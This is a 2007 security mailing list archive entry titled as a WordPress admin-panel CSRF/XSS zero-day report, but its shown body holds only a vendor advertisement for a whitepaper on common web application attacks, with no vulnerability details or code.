WebApp Sec mailing list archives

WordPress AdminPanel CSRF/XSS - 0day

From: SaMuschie <samuschie () yahoo de>
Date: Mon, 26 Feb 2007 21:50:57 +0100 (CET)

The Twelve Most Common Application-level Hack Attacks
Hackers continue to add billions to the cost of doing business online
despite security executives' efforts to prevent malicious attacks. This
whitepaper identifies the most common methods of attacks that we have seen,
and outlines a guideline for developing secure web applications.
Download today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHe